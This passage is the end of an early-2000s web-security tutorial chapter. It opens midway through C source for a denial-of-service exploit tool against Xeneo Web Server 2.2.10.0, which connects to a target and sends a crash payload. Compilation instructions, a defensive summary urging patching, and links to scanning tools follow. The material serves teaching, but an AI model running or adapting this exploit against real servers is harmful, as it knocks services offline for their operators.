        printf("Xeneo Web Server 2.2.10.0 DoS\r\n <[email protected]>\r\n\r\n");
        printf("Tool Usage:\r\n %s <targetip> [targetport] (default is 80)\r\n\r\n", argv[0]);
        printf("www.security-protocols.com\r\n\r\n");
        exit(1);
    }

    wVersionRequested = MAKEWORD(1, 1);
    /* WSAStartup returns 0 on success and a positive error code otherwise */
    if (WSAStartup(wVersionRequested, &wsaData) != 0) return -1;

    target = argv[1];

    /* for default web attacks */
    port = 80;
    if (argc >= 3) port = atoi(argv[2]);

    mysocket = socket(AF_INET, SOCK_STREAM, 0);
    if (mysocket == INVALID_SOCKET)
    {
        printf("Socket error!\r\n");
        exit(1);
    }

    printf("Resolving Hostnames...\n");
    if ((pTarget = gethostbyname(target)) == NULL)
    {
        printf("Resolve of %s failed\n", argv[1]);
        exit(1);
    }

    memset(&sock, 0, sizeof(sock));
    memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
    sock.sin_family = AF_INET;
    sock.sin_port = htons((USHORT)port);

    printf("Connecting...\n");
    if (connect(mysocket, (struct sockaddr *)&sock, sizeof(sock)))
    {
        printf("Couldn't connect to host.\n");
        exit(1);
    }

    printf("Connected!...\n");
    printf("Sending Payload...\n");
    if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
    {
        printf("Error Sending the Exploit Payload\r\n");
        closesocket(mysocket);
        exit(1);
    }

    printf("Remote Webserver has been DoS'ed \r\n");
    closesocket(mysocket);
    WSACleanup();
    return 0;
}

You can compile this exploit with Microsoft Visual Studio 6.0.

Summary

In this chapter we have learned many ways of scanning for and finding vulnerabilities and weaknesses in web servers and web applications. It is important to apply vendor security patches promptly, turn off unneeded features on the web server, and regularly scan your own network for vulnerabilities.


References


Security Sites

http://security-protocols.com
http://eEye.com
http://packetstormsecurity.nl
http://astalavista.com

Scanning Tools

Nikto http://www.cirt.net/code/nikto.shtml
Whisker http://www.wiretrip.net/rfp/
Shadow Security Scanner http://www.safety-lab.com

Fuzzing Tools

SPIKE http://www.immunitysec.com/spike.html


badpack3t
[email protected]
www.security-protocols.com

Copyright © 2000-2003 Security-Protocols Inc. All trademarks are property of their respective owners and are used here for entertainment purposes only.
